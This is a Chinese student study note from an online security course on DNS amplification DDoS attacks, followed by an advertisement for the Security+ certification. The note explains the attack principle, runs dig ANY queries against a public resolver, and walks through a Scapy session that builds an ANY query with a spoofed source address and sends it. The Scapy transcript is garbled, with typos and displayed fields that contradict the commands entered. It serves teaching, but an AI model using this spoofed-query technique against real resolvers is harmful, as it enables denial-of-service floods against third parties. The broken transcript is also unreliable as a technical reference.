【安全牛学习笔记】DNS放大攻击

来源:互联网 发布:英伟达超频软件 编辑:程序博客网 时间:2024/05/31 06:23

DNS放大攻击                                                  

产生大流量的攻击方法                                         

    - 单机的宽带的优势                                       

    - 巨大单机数量形成的流量汇聚                              

    - 利用协议特性实现放大效果的流量                          

DNS协议放大效果                                              

    - 查询请求流量小,但响应流量可能非常巨大                  

    - dig ANY hp.com @202.106.0.20 (流量方法约8倍)          

攻击原理                                                     

    - 伪造源地址为被攻击目标地址,想退敌域名查询服务器发起查询

    - DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDos

wireshark 

ip.addr == 202.106.0.20

root@K:~# dig any baidu.com @202.106.0.20

root@K:~# dig any qq.com @202.106.0.20

root@K:~# dig any hp.com @202.106.0.20

root@K:~# scapy

WARNING: NO route found for IPV6 destination :: (no default route?)

welcome to Scapy (2.3.2)

>>> i=IP()

>>> i.display()

###[ IP ]###

  version = 4

  ihl = None

  tos = 0x0

  len = None

  id = 1

  flags= 

  frag= 0

  ttl = 64

  proto = tcp

  chksum = None

  src = 127.0.0.1

  dst = 127.0.0.1

  \options\

>>> i.dst="202.106.0.20"

>>> i.display()

###[ IP ]###

  version = 4

  ihl = None

  tos = 0x0

  len = None

  i d= 1

  flags = 

  frag = 0

  ttl = 64

  proto = tcp

  chksum = None

  src = 127.0.0.1

  dst = 202.106.0.20

  \options\

>>> u=UDP()

>>> u.display

###[ UDP ]###

  sport=domain

  dport=domain

  len=None

  chksum=None

>>> u.dport

53

>>> d=DNS()

>>> d.display()

###[ DNS ]###

  id = 0

  qr = 0

  opcode = QUERY

  aa = 0

  tc = 0

  rd = 0

  ra = 0

  z = 0

  ad = 0

  cd = 0

  rcode = ok

  qdcount = 0

  ancount = 0

  nscount = 0

  arcount = 0

  qd = None

  an = None

  ns = None

  ar = None

>>> d.rd=1

>>> d.qddount=1

>>> d.display()

###[ DNS ]###

  id = 0

  qr = 0

  opcode = QUERY

  aa = 0

  tc = 0

  rd = 1

  ra = 0

  z = 0

  ad = 0

  cd = 0

  rcode = ok

  qdcount = 1

  ancount = 0

  nscount = 0

  arcount = 0

  qd = None

  an = None

  ns = None

  ar = None

>>> q=DNSQR()

>>> q.display()

###[ DNS Question Record ]###

  qname = '.'

  qtype = A

  qclass = IN

>>> q.qname='qq.com

>>> q.qname=255

>>> q.display()

###[ DNS Question Record ]###

  qname = 'qq.com'

  qtype = ALL

  qclass = IN

>>>d.qd=q

>>>d.display()

###[ DNS ]###

  id = 0

  qr = 0

  opcode = QUERY

  aa = 0

  tc = 0

  rd = 1

  ra = 0

  z = 0

  ad = 0

  cd = 0

  rcode = ok

  qdcount = 1

  ancount = 0

  nscount = 0

  arcount = 0

  qd = None

  an = None

  ns = None

  ar = None

###[ DNS Question Record ]###

  qname = '.'

  qtype = A

  qclass = IN

>>> r=(i/u/d)

>>> r

<IP frag=0 proto=udp dst=202.106.0.20 |<UDP  sport=domain |<DNS  rd=1 qdcount=1 qd-<DNSOR qname='qq.com' qtype=ALL |> |>>>

>>> r.display()

###[ IP ]###

  version = 4

  ihl = None

  tos = 0x0

  len = None

  i d= 1

  flags = 

  frag = 0

  ttl = 64

  proto = tcp

  chksum = None

  src = 127.0.0.1

  dst = 192.168.1.115

  \options\

###[ UDP ]###

  sport=domain

  dport=domain

  len=None

  chksum=None

###[ DNS ]###

  id = 0

  qr = 0

  opcode = QUERY

  aa = 0

  tc = 0

  rd = 1

  ra = 0

  z = 0

  ad = 0

  cd = 0

  rcode = ok

  qdcount = 1

  ancount = 0

  nscount = 0

  arcount = 0

  qd = None

  an = None

  ns = None

  ar = None

###[ DNS Question Record ]###

  qname = '.'

  qtype = A

  qclass = IN

>>> srt(r)

>>> i.src="192.168.1.115"

>>> r=(i/u/d)

>>> r.display()

###[ IP ]###

  version = 4

  ihl = None

  tos = 0x0

  len = None

  i d= 1

  flags = 

  frag = 0

  ttl = 64

  proto = tcp

  chksum = None

  src = 127.0.0.1

  dst = 202.106.0.20

  \options\

###[ UDP ]###

  sport=domain

  dport=domain

  len=None

  chksum=None

###[ DNS ]###

  id = 0

  qr = 0

  opcode = QUERY

  aa = 0

  tc = 0

  rd = 1

  ra = 0

  z = 0

  ad = 0

  cd = 0

  rcode = ok

  qdcount = 1

  ancount = 0

  nscount = 0

  arcount = 0

  qd = None

  an = None

  ns = None

  ar = None

###[ DNS Question Record ]###

  qname = '.'

  qtype = A

  qclass = IN

>>> send(r)

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

阅读全文
0 0
原创粉丝点击